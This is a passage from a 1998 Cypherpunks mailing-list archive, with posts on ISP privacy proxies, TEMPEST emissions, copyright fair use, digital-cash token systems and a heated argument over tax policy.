the I/O delays will still be there.

I think ISPs should offer a proxy service for WWW access. They have
bigger pipes.

This could include an opt-in (configure through an ISP-local WWW page)
adbuster. At the same time, it would to a certain extent anonymize
access.

And let's say cable-modem access becomes wide-spread, and legislation
forces the cable companies to allow ISP choice. I think ISPs that offer
some privacy in user access over this shared medium will have a leg-up
on their competition.

That would involve software residing local to the user's box that
would encrypt access between them and the ISP for WWW, email, ftp, etc.
More than just ssh.

Hey, then you would finally have ads that make clear what encryption
is for the average user: picture two neighbors going to work in the
morning meeting in the elevator, and one starts hinting he knows
what the other was receiving for email, which sites he was surfing...

Maybe the Anonymizer.com people will release/sell such software for ISPs,
and, of course, sans GAK.

---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 9 Nov 1998 06:07:51 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811082058.OAA06231@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
> 	 (fwd)
> Date: Sun, 8 Nov 1998 12:39:33 -0800 

> > You missed my point.  What I'm trying to point out is that no 
> > government (or any other body, for that matter) can prevent 
> > someone from doing something. All the state can do (and does,
> > if you look closely) is offer to punish anyone who disobeys it.
> 
> Again that is simply incorrect, or do you wish to tell me that our military
> has not prevented the invasion of the continental US in this century, or
> that it did not prevent the Soviet Union from expanding across Europe? You
> cannot completely discount *deterrent force*, although it is greatly
> overrated.

Woah. This extension into foreign powers and such is an entirely different
venue. The entire discussion is based around the question of a government
and those citizens within it. When we start talking about multiple
government and multiple citizen sets the whole issue is orders of magnitude
more complex.

> Nor can a government use *retribution force* if it does not know the
> perpetrator.

Tell that to the hostages that were killed during the occupation of France.

> Your statement boils down to the government is not omnipotent. Well duh!

Agreed.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Mon, 9 Nov 1998 06:12:51 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: TEMPEST laptops (fwd)
In-Reply-To: <199811050611.AAA10989@einstein.ssz.com>
Message-ID: <19981108155839.C15373@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Nov 05, 1998 at 12:11:20AM -0600, Jim Choate wrote:

> 
> It depends on the frequency. Last time I checked a laser or a maser (both
> are radio waves strictly speaking) travel LOS. The scattering comes from
> beam divergence and incidental refractions and reflections from the
> molecules in the air and supported detritus.

	Lasers are a technology for generating light, not kinds of
radio waves.  And masers are a fairly obscure technology for amplifiying
weak microwave signals in cryogenicly cooled devices.  Both deal with
electomagnetic radiation and obey Maxwells laws ....

> 
> > Microwave ovens work by having the waves bounce around inside a box. Any
> > significant hole or crack (up to roughly half the wavelength) would let the
> > waves out.
> 
> Depends on the size of the hole and location. In most microwave ovens there
> are definite dead-spots (corners and the exact center of the area are
> notorius).

	Most microwave ovens incorperate a motorized metallic device
called a stirrer that sits directly in the beam of energy from the
magnetron and is designed to reflect microwave energy bouncing around
the cavity and change the standing wave pattern as it rotates, resulting
in much more even distribution of energy.   Without the stirrer hots
spots would be much worse...


> 
> > An open top box will not work.
> 
> If the microwaves (for example) are transmitted parallel to the open side it
> might very well work just fine. It's going to depend on a variety of
> factors that will preclude such a blanket statement from being valid.
> 
	Difraction becomes very significant for openings near in scale to
the wavelength of the energy in question, thus the edges of the top will
act to scatter energy in all directions...

> 
> The absolute magnitude isn't really important.
> 
> Most of the signals that are emitted by a computer are not in the 100dB
> dynamic range (@2x=3db that's a signal range of 1:33) , more likely 40-50db
> if that. For a TTL (5V) signal it barely covers 3dB (LOW is <2.5v and a
> high is >=4.75). There simply is no way in hell a signal with a 3dB range is
> going to emit a rf signal that is 100dB.

	This makes no sense whatsoever.  The EM radiation takes place
when changes in the current flowing happen.   Thus radiation occurs only
when the TTL signal changes state, not during either its high voltage or
low volage state.  The amplitude of the current step is determined by
the impedance of the circuit and how fast the logic switches and how
great the voltage or current swing is , and how effectively it gets
radiated is determined by the geometry of the conductor and its
sourounding ohjects.  EM radiation results only from changes in the
magnetic and electric fields, not from their steady state values.   Thus
it is entirely meaningless to talk of the change in steady state values
as only "3 db" when no radiation results from either the steady high or
steady low value.   And indeed near the conductor, the energy radiated
from the current step will be 100 db greater than the ambiant (decibels
are relative units, thus it is meaningless to talk of "radiating a rf
signal that is 100 db").


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 9 Nov 1998 05:23:17 +0800
To: cypherpunks@Algebra.COM
Subject: Re: A question about the new ISP ruling and email...
Message-ID: <199811082015.VAA11783@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:29 PM 11/7/98 GMT, phelix@vallnet.com wrote:
>Is an anymous remailer needs to register, what will the implications be?

Armbands next, bubby.

 






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>nicolo@mach.iavel.li
Date: Mon, 9 Nov 1998 05:21:51 +0800
To: cypherpunks@Algebra.COM
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
In-Reply-To: <199811071710.LAA02112@einstein.ssz.com>
Message-ID: <199811082022.VAA12297@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>You are proposing a means of setting up a benign government.  For it to be
>a government, it must wield sufficient power to rule.  For it to be
>benign, it must be run by "good" men (i.e. those who will not use the
>state to increase their personal power).  But as you pointed out, it is
>foolish to trust that the state will be run by such individuals,
>regardless of who they are.  Thus it would seem that it is impossible to
>create a benign state.  Thus we should avoid having one.

State is not "created" or "set up". This assumes in-born willingness and
desire of subjects to have a state, and that a state becomes because
so-called "people" need it. Or that having a state is somehow natural
order of things.

A state is just an extension of a tribal power structure, or, deeper
into the past, successor to silverback hierarchy. A group of people
(families, clans, etc.) that happen to have power over the rest on some
territory. The centuries long brainwashing to the contrary has
successfully muddled the issue and made it "something complicated and
not for ordinary people to worry about." And a great topic for ranting.

The semantics of this indoctrination are deep in the language. In
newspeak it is impossible to think wrong thoughts. A state is not "run"
by individuals - (that neatly implies that it is something above mere
individuals) - state is just a terrific excuse for individuals for
herding the rest.

"State" is not good or bad, any more that a tree is good or bad. State
is creation of human ability to abstract, and demonstrates
self-limiting attribute of intellect in general. We are capable of
imagining extremely perverse systems for screwing ourselves voluntarily.
Using that to one's personal benefit is as natural as eating. And history
proves that.

The question is, can we really escape newspeak limitations ? Is a new
language required for individuals to exist ? Maybe use of an ancient
tongue that is not polluted with the modern bias ?

Me




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Mon, 9 Nov 1998 05:02:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Blind signal demodulation
Message-ID: <91055510827766@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



"Matt Crawford" <crawdad@fnal.gov> wrote:
 
>>The October 1993 Proceedings of the IEEE contain a number of rather ...
>>... They also comment that blind decoders for typical voiceband
>>signals can be implemented on Pentium MMX/UltraSparc-grade hardware.
 
>Did you make specific a more general spec they made, or did you typo the date
>of the issue?
 
Oops, that should be October 1998, not 1993 (ie last months issue).  Sorry
about that.
 
Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Tue, 10 Nov 1998 08:18:47 +0800
To: cypherpunks@toad.com
Subject: Semi-relevant spam - Re: legislation -- read
In-Reply-To: <199811061627.JAA16550@token1.tokensystems.com>
Message-ID: <3.0.5.32.19981109092119.008aab80@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



It was SPAM, but it does have some relevance to the digital cash business,
so I'll comment on it.  The IP address really is tokensystems.com.
They're in the business of selling tokens and/or tickets which
customers can buy and use to pay for access to web sites,
and which web site owners can redeem for cash with tokensystems.
Tickets cost $1 (I think something they sell is 10 cents, though),
and tokensystems keeps 40% of the take, giving the web site 60%.
The target market is viewing artwork on the net, and they claim
to have sold over 4 million tokens, presumably mostly the porn market
(unlike Mark Twain, which probably never handled that much Digicash :-)
The attraction for customers is that unlike plunking down $X
on credit card for membership at a given web site that they might or
might not think was worthwhile, creates lots of credit card transaction records, 
and which would definitely sell their info to spammers, 
they make one transaction and buy tokens which can be used
at multiple sites, reducing the number of transactions.

Tokensystems doesn't list a privacy policy (except that they offer a 
ticket-buying page that doesn't have porn ads for sites that prefer it).
Don't know if this means they don't have a policy, 
or if their policy is to sell customer info to anyone they can.
If they do offer privacy, they might want to post a privacy policy page
(usng whatever ETrust / TrustE calls itself these days),
and it might be an interesting market for Chaumian blinded tokens,
since customers might like knowing their token uses aren't
traceable back to their purchase records.

They also don't say what they do for fraud prevention - looks like
it's probably online clearing, which reduces their risk,
and makes digicash relatively convenient to deploy.


At 09:27 AM 11/6/98 -0700, bob@tokensystems.com wrote:
>Dear Fellow Webmaster:
>
>The recent events and pending legislation that have rocked the web are
>sure to place new restrictions on the business. We think this is a
>very good solution.
>
>Check it out http://209.203.80.254/exe/tpromo1.cgi?7026131
>
>Or call us if you have any questions.
>Bob
>818-559-3484
>
>
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 10 Nov 1998 00:23:45 +0800
To: cypherpunks@Algebra.COM
Subject: Wang touts spy-proof portable
Message-ID: <3646FFCE.CBF343B6@playboy.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.news.com/News/Item/0,4,28483,00.html?st.ne.ni.lh


Wang Global has introduced a new portable computer,
but it's not going to be winning any svelteness
contests. 

Wang's Tempest Mobile Workstation, 3 inches thick
and weighting 14.5 pounds, is designed for
government officials who need spy-proof computers
that don't leak any telltale signals to electronic
eavesdroppers. 
...


I want...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 10 Nov 1998 02:18:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Advertising Creepiness
In-Reply-To: <v04003a05b26c50a4abc7@[24.1.50.17]>
Message-ID: <v03130306b26cd8b81703@[209.66.101.228]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:04 AM -0800 11/9/98, Declan McCullagh wrote:
>I didn't see Tim's original post, but I wouldn't be at all surprised to see
>such a right "emerge" in claims by media company lawyers. (Probably not the
>advertisers.)
>
>Something that came across our Reuters feed over the weekend is a lawsuit
>by the whitehouse.com folks -- they're pissed that a new version of
>Netscape has some "intelligent" guessing features that, when someone types
>in "whitehouse," automatically take 'em to whitehouse.gov.
>
>Which interferes with the rights of the whitehouse.com porn site, or so the
>argument goes.

Seems to me there are numerous variants and angles:

* If the adbuster is user-controlled, it's like handing a copy of "Time" to
a butler and saying "Please clip out the articles and throw away all the
ads."

* And "clipping services" do this and redistribute the results to clients,
perhaps with some "copyright remuneration" to the publisher (I just don't
know). The ads are obviously not retained.

* If a content supplier (Web page, magazine, etc.) has the power to stop
adbusters from removing ads, does it also have the power to stop font
changes? Or colors? Can a television commercial maker sue to stop viewers
from disabling color when viewing his commercial?

(Of course this wouldn't happen, for various logistical and common sense
reasons, but it seems to me analogous to where users disable dancing Java
applets....if disabling dancing Java applets is ruled a violation of the
advertiser's leasing of the original copyright, why not block anyone who
interferes with a television ad?)

* The "whitehouse.com" --> "whitehouse.gov" thing is just another skirmish
in the whole Namespace War. Corporations will try to get browsers and
search engines to turn spelling errors or perceived errors to their favor.
"intek.com" --> "intel.com"


I'm glad I'm not a lawyer.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Igor Chudov <ichudov@video-collage.com>
Date: Mon, 9 Nov 1998 23:41:23 +0800
To: cypherpunks-outgoing@video-collage.com
Subject: test5
Message-ID: <199811091504.KAA15499@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain


test5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <Andrew.Loewenstern@wdr.com>
Date: Tue, 10 Nov 1998 00:43:58 +0800
To: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Subject: Re: Digicash bankruptcy
In-Reply-To: <002701be0939$b34ce720$bf011712@games>
Message-ID: <9811091614.AA00393@ch1d524iwk>
MIME-Version: 1.0
Content-Type: text/plain



Phill writes:
>  The fact that Chaum didn't have the monopoly he appeared to
>  imagine is probably why nobody was queuing up to pay his
>  demands.

Name some other deployable payer anonymous electronic payment systems that are  
in competetion with DigiCash.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 9 Nov 1998 23:54:22 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Advertising Creepiness
In-Reply-To: <199811090115.RAA23804@smtp.well.com>
Message-ID: <199811091519.KAA01473@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain




   >   From: Declan McCullagh <declan@well.com>
   >   Subject: Re: Advertising Creepiness
   >
   >   Something that came across our Reuters feed over the weekend is a lawsuit
   >   by the whitehouse.com folks -- they're pissed that a new version of
   >   Netscape has some "intelligent" guessing features that, when someone types
   >   in "whitehouse," automatically take 'em to whitehouse.gov.
   >
   >   Which interferes with the rights of the whitehouse.com porn site, or so the
   >   argument goes.

At least it doesn't cost $40 million to get porn from whitehouse.com.
Sounds like a pro-consumer move to me. ;-)


   >   At 12:59 PM 11-8-98 -0500, Information Security wrote:
   >   >   >   From owner-ignition-point@majordomo.pobox.com Sat Nov  7 16:04:32 1998
   >   >   >   From: Robert Hettinga <rah@shipwright.com>
   >   >   >
   >   >   >   Now *this* should be fun. Someone who claims to be a cypherpunk is now
   >   >   >   going to call the copyright police on a non-profit, volunteer news list.
   >   >
   >   >Would you like to know whether it is "fair use" to repost entire articles?
   >   >
   >   >I would.
   >   >
   >   >   >   When the going gets tough, the "tough" rat out the innocent...
   >   >
   >   >"Innocent" is hardly an accurate description of Michele Moore.
   >   >
   >   >Would you like Information Security to cough up more
   >   >color on his netcopping move?

   >   From declan@well.com Sun Nov  8 20:15:48 1998
   >
   >   Whether you love or hate current copyright laws, it's a stretch to argue
   >   that it's legal to republish (by forwarding) articles in full.
   >
   >   Willfully redistributing copyrighted material in violation of fair use
   >   principles is, depending on the value, also a federal crime. Redistributing
   >   a $1 article to thousands of people would be a felony. (Note I don't
   >   endorse this law, but it's useful to know what the law is.)

I guess that qualifies as a request for more color.

In the local Panix Usenet groups, I've reposted quite a few whole articles,
often from the IP list.

Finally, a couple people made a stink, and officially complained to Panix.

Carl Fink <carlf@panix.com> wrote:
:   On 11 Sep 1998 23:54:58 GMT, Information Security <The@NSA.sucks> wrote:

:   Okay, I've been tolerating this for a long time, but:  this is a
:   violation of both Federal and international law. Post URLs, not articles.

My inelegant response:

    Eat me.

The local posters kept applying pressure:

:   But beyond whatever legal consequences this may entail for you
:   personally, I wonder what consequences it could conceivably entail for
:   panix.  Posting copyrighted material to general Usenet newsgroups is
:   one thing -- panix's staff could reasonably claim that they cannot
:   monitor or filter every Usenet newsgroup.  But they could not
:   reasonably make that argument about the local panix newsgroups.

The thread grew full of legal claims, and Panix consulted with lawyers.

In the following post by the owner of Panix, the references
to "sections 1,3,4" are from the IP list's fair use declaration
URL http://www.law.cornell.edu/uscode/17/107.shtml


#   Path: news.panix.com!not-for-mail
#   From: alexis@panix.com (Alexis Rosen)
#   Newsgroups: panix.announce,panix.policy,panix.chat,panix.questions
#   Subject: Determination on copyright issue
#   Date: 17 Sep 1998 11:28:27 GMT
#   Organization: PANIX Public Access Internet and Unix, NYC
#   
#   
#   This message is in response to the discussion/flamewar in several groups
#   over the posting of copyrighted material by guy@panix.com. Please read it,
#   think about it, read it again, and think again before posting in response.
#   This is a pretty nasty subject.
#   
#   In the wake of the postings and complaints to staff about guy's postings,
#   I consulted with two lawyers about this issue. One was a BLM, and the other
#   is a BLM and RIPE too. (Those are extremely technical acronyms for Brilliant
#   Legal Mind and Recognized Intellectual Property Expert. :-)
#   
#   [snip]
#   
#   I'm not going to go into the details much, because IANAL. But in short,
#   here's the answer: Fair use is a VERY fuzzily-defined concept, not in
#   principle where it's stated clearly in the law (as quoted here several
#   times recently), but in practice, where the courts try to interpret it.
#   Guy's claim for fair use could easily be correct, according to the BLMs,
#   because it may well qualify under sections 1, 3, and 4. I didn't think
#   so, but then again, I'm not a BLM, much less a RIPE. It would be a truly
#   terrible idea for us to take action, given the reasonable possibility that
#   there is no violation.
#   
#   It was also pointed out to me that Panix can not act against Guy's posts
#   without threatening its own position in any future case that might hinge
#   on whether Panix were an Editor of panix group contents. This might or
#   might not be the case were someone to start posting large quantities of
#   commercial software, but the two cases aren't similar, since guy's
#   postings aren't obvious and uncontestable violations.
#   
#   In any event, the BLMs' opinion was that I should very definitely leave
#   guy alone. This ruling extends to the one or two others that occasionally
#   post copyrighted material of similar nature, including one of Panix's staff.
#   
#   Of course, were the volume of such posts to rise substantially, things might
#   be different. So this should not be seen as an invitation for all Panixians
#   to start posting their favorite copyrighted material here on a regular
#   basis.
#   
#   Lastly: In an ideal world, everyone would learn from this and leave the
#   topic, wiser if sadder. In this less-than-ideal world, if you really want
#   to post a followup, I suggest that you consult a lawyer. If I hadn't, I'd
#   surely have stuck my foot in my mouth all the way up to my knee the first
#   time I posted about this topic.
#   
#   /a

So, I was allowed to continue posting whole articles.

That's what the lawyers advised.

Then, the Digital Copyright Massive Federal Interference Act...

>   Fair Use vs. Intellectual Property: The U.S. Congress
>   passed the Digital Millenium Copyright Act, a bill designed to
>   distinguish between fair use and protected intellectual property
>   in cyberspace.
>   
>        <http://thomas.loc.gov/cgi-bin/bdquery/z?d105:s.01146:>

I chose the IP list as the next-level test case...
---guy




snipped source: http://www.wcco.com/news/stories/news-981106-144532.html

Suspicious Object Found On Capitol Mall Was Not A Bomb

ST. PAUL, Updated 8:35 p.m. November 6, 1998 -- Police hauled away a package
with the words "Impeach Clinton Now" and signed by "the Mad Bomber" from the
state Capitol on Friday, but temporarily lost when it flew out of a bomb
squad trailer.

A KSTP-TV helicopter was following the bomb squad van as it drove off
towing a trailer containing the suspicious package. The station was
taping as the package flew out of the open trailer in the wind and
at least three cars ran over it.

It took police about an hour to find the remains in the highway median.

Some 200 employees, including Gov.-elect Jesse Ventura, were forced to leave
the Capitol...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@Algebra.COM
Date: Tue, 10 Nov 1998 00:04:05 +0800
Subject: No Subject
Message-ID: <199811091527.KAA16405@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain


>From ichudov  Mon Nov  9 10:27:22 1998
Received: (from ichudov@localhost)
	by mail.video-collage.com (8.9.1a/8.8.5) id KAA16394
	for cypherpunks; Mon, 9 Nov 1998 10:27:22 -0500 (EST)
Date: Mon, 9 Nov 1998 10:27:22 -0500 (EST)
From: Igor Chudov <ichudov>
Message-Id: <199811091527.KAA16394@mail.video-collage.com>
To: cypherpunks
Subject: test5
Reply-To: ichudov@algebra.com (Igor Chudov)
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com


test5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 01:12:27 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811091643.KAA11939@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "X" <xasper8d@lobo.net>
> Subject: RE: How to solve the tax problem w/o anarchy or force
> Date: Mon, 9 Nov 1998 08:56:29 -0700

> I hope against hope that you are being sarcastic, here.  Obviously our
> F**KED up red-tape spewing government could never pull off such an endeavor.
> Unless, of course, there was a simple way to tell the tax-payers apart from
> those wretched NON-payers.  Maybe something like an ARMBAND?  Embedded
> sub-cut microchip?  Bar-code tattoos?
> 
> Now you've got a workable plan!

How do they tell if you pay taxes now? They keep records. The taxpayer could
also be issued a receipt as proof. Make it DL sized and it'd go right in
your wallat.

It would actualy reduce the amount of paperwork because the vast amount of
enforcement labor and resources wouldn't be needed.

Then there is the obvious observation that folks such as yourself wouldn't
lie about not-being a tax-payer if asked by the nice fireman who just saved
your house (after all it would be a serious crime).

Me thinks you protest too much. It isn't that you don't want to pay taxes,
or that you object to paying higher costs for services than a regular tax
payer. You simply want somebody else to pay for the services you use at
no cost to yourself.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 10 Nov 1998 03:26:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Advertising Creepiness
In-Reply-To: <199811091403.GAA27556@smtp.well.com>
Message-ID: <v03130307b26ce801b2ef@[209.66.101.228]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:50 AM -0800 11/9/98, Tim May wrote:

>Seems to me there are numerous variants and angles:
>
>* If the adbuster is user-controlled, it's like handing a copy of "Time" to
>a butler and saying "Please clip out the articles and throw away all the
>ads."
>
>* And "clipping services" do this and redistribute the results to clients,
>perhaps with some "copyright remuneration" to the publisher (I just don't
>know). The ads are obviously not retained.

By the way, the White House and Pentagon are major forwarders of clipped
material. The daily intelligence briefing, for example, clips from
newspapers, magazines, wire services, etc.

I can understand Declan trying to be a loyal reporter by urging people to
buy the magazine or go to the ad-laden site, but clearly a lot of folks are
already bouncing stuff around cyberspace, including the White House.

It is _remotely_ possible that the gov't. is paying some token amount to
Time Warner, CNN, WSJ, etc., but I doubt it.

Speaking of the gov't. conveniently ignoring what it expects private
players to do, a few days before the California election I got a telephone
phone solicitation from a male voice identifying himself as the Calif.
Secretary of State. Ordinary advertising, right?

Well, it was a) left on my answering machine, and b) was itself a recording.

California officials not subject to the "robot's rules of order" laws,
which forbid the practices above, especially in combination. You can bet
that if J. Random Corporation was using robot dialers and leaving recorded
messages on answering machines there would be the threat of prosecution.
(Actually, most threats to corporations are just shakedowns, and are
considered discharged when the corporation makes the appropriate campaign
contribution.)

Of course, in a system where the Chief Executive can perjure himself with
impunity, can suborn perjury, can tamper with evidence, and can use public
monies to cause his subordinates to suborn perjury and perjure and tamper
with evidence....

(Not to mention violating the export laws and committing high treason by
supplying the Red Chinese with ICBM technology....and kiling Vince Foster
for his attack of conscience and his plans to meet with a reporter....)

Ah, Amerika.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 01:28:05 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811091704.LAA12150@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "X" <xasper8d@lobo.net>
> Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
> Date: Mon, 9 Nov 1998 09:54:00 -0700

> ~> Me thinks you protest too much. It isn't that you don't want to

     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

> ~> pay taxes,
> ~> or that you object to paying higher costs for services than a regular tax
> ~> payer. You simply want somebody else to pay for the services you use at
> ~> no cost to yourself.
> ~>
> 
> I think that remark was unfair, uncalled-for, and rude.  No where in my post
> did I say anything about not wanting to pay.  I thought my post was humorous
> and in the same sarcastic vein as yours.

It was a reply to your statement. If you don't want people to ask questions
or draw conclusions from your statements then perhaps you should rething
even making those statements. As to sarcasm, there was none in my original
posting.

> You have insulted me publicly while having no knowledge of who you were
> slighting.

No, I expressed an opinion as to your motivation. Opinions never insult
except when presented as fact. I did not do that.

Me still thinks yo protest too much.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 02:08:25 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811091725.LAA12280@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "X" <xasper8d@lobo.net>
> Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
> Date: Mon, 9 Nov 1998 10:22:00 -0700

> So you are one of those people that truly believes you can insult someone in
> public, then say, "I was responding to you" and cap it off with "it's my
> opinion" ?  You have formed an opinion about me already?  And that opinion
> includes the fact that I want other people to carry my weight?  How absurd
> you are, little man!

I simply based it on your apparent motivations based on your statements.

> If I had thought you were serious about your article, I would have pointed
> out the huge flaws in your theory.  I gave you credit for well-thought
> sarcasm when apparently it was neither.

I'm waiting...


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Tue, 10 Nov 1998 03:01:27 +0800
To: "Jim Choate" <cypherpunks@einstein.ssz.com>
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811091725.LAA12280@einstein.ssz.com>
Message-ID: <000b01be0c0f$19720c60$9d2580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



Sorry, everyone, for this crap coming up, but JIM CHOATE wants you all to
see it...

Jim,

You keep reposting this to the cpunx list, and I keep trying to discuss it
with you in private.

X says:
~> > If I had thought you were serious about your article, I would
~> have pointed
~> > out the huge flaws in your theory.  I gave you credit for well-thought
~> > sarcasm when apparently it was neither.
~>
And Jim's witty response was:
~> I'm waiting...

Correct me if I'm wrong, but the gist of your system was a two-tiered
payment schedule where Group A could be called TaxPayers and Group B could
be called NON-Payers.  Right?

And basically, Group A would get all of the benefits that a fully paid
membership would entail, right?  Secondly, Group B would "not pay taxes" and
would NOT be entitled to any benefits save for on a pay-as-you-go type
arrangement.  Right?

What USGov't services do you include in your proposal?  Let's list a few,
(feel free to jump in with some more.)
U.S. Mail services
Common defense
Air traffic controlling
roadways and interstates
Food and Drug Administration approvals
Federally mandated minimum wage
automobile safety standards

Is your tax progressive or regressive?

If I'm right so far (which I may or may not be) then we have to talk about
your definition of "paying taxes."  Does a single woman raising five kids
and paying a small mortgage making  $14,200 per year pay taxes?  No,
unfortunately for her, she doesn't.  I guess that puts her smack into GROUP
B!  Well, that's simple enough!  We'll deny her the creature comforts of the
list above until she chips in her proportionate cost, right?  When that
libertarian bitch tries to send mail, we'll charge her more!  WHen she gets
on the freeway, we'll toll her!  When she buys a medicine for her snot-nosed
urchin, we'll give her the stuff that ain't been FDA approved, right?
RIGHT!  And, if ever we should need to attack another country (or defend
ours, as you pointed out) SHE'LL happily volunteer to serve (as I remember
your post) in order to protect her TAX-FREE STATUS.

As you said to me, she's probably just looking for someone to shoulder her
part of the load, right?

You said it would be easy to implement, right?  I don't see that it would be
easy at all.

Once again, I apologize for the OFF TOPIC nature of this, but MR. COHATE
(freudian slip, or merely coincidence?  you be the judge!) insisted on
duking this out in public.

X




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
